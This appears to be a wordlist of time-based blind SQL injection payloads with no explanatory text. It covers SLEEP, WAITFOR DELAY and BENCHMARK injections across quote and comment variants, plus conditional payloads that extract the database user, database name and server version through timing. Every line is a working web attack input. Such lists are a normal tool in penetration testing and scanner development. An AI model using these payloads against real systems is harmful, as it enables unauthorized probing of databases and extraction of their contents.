' AND SLEEP(5)--
' AND SLEEP(5)#
' AND SLEEP(5)/*
'; WAITFOR DELAY '0:0:5'--
'); WAITFOR DELAY '0:0:5'--
" AND SLEEP(5)--
" AND SLEEP(5)#
" AND SLEEP(5)/*
"; WAITFOR DELAY '0:0:5'--
"); WAITFOR DELAY '0:0:5'--
` AND SLEEP(5)--
` AND SLEEP(5)#
` AND SLEEP(5)/*
`; WAITFOR DELAY '0:0:5'--
`); WAITFOR DELAY '0:0:5'--
AND BENCHMARK(5000000,MD5(1))
OR BENCHMARK(5000000,MD5(1))
' AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
' AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1))>=100, 1, SLEEP(3)) --
' AND (SELECT SLEEP(10) FROM DUAL WHERE DATABASE() LIKE 'SA___')#
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
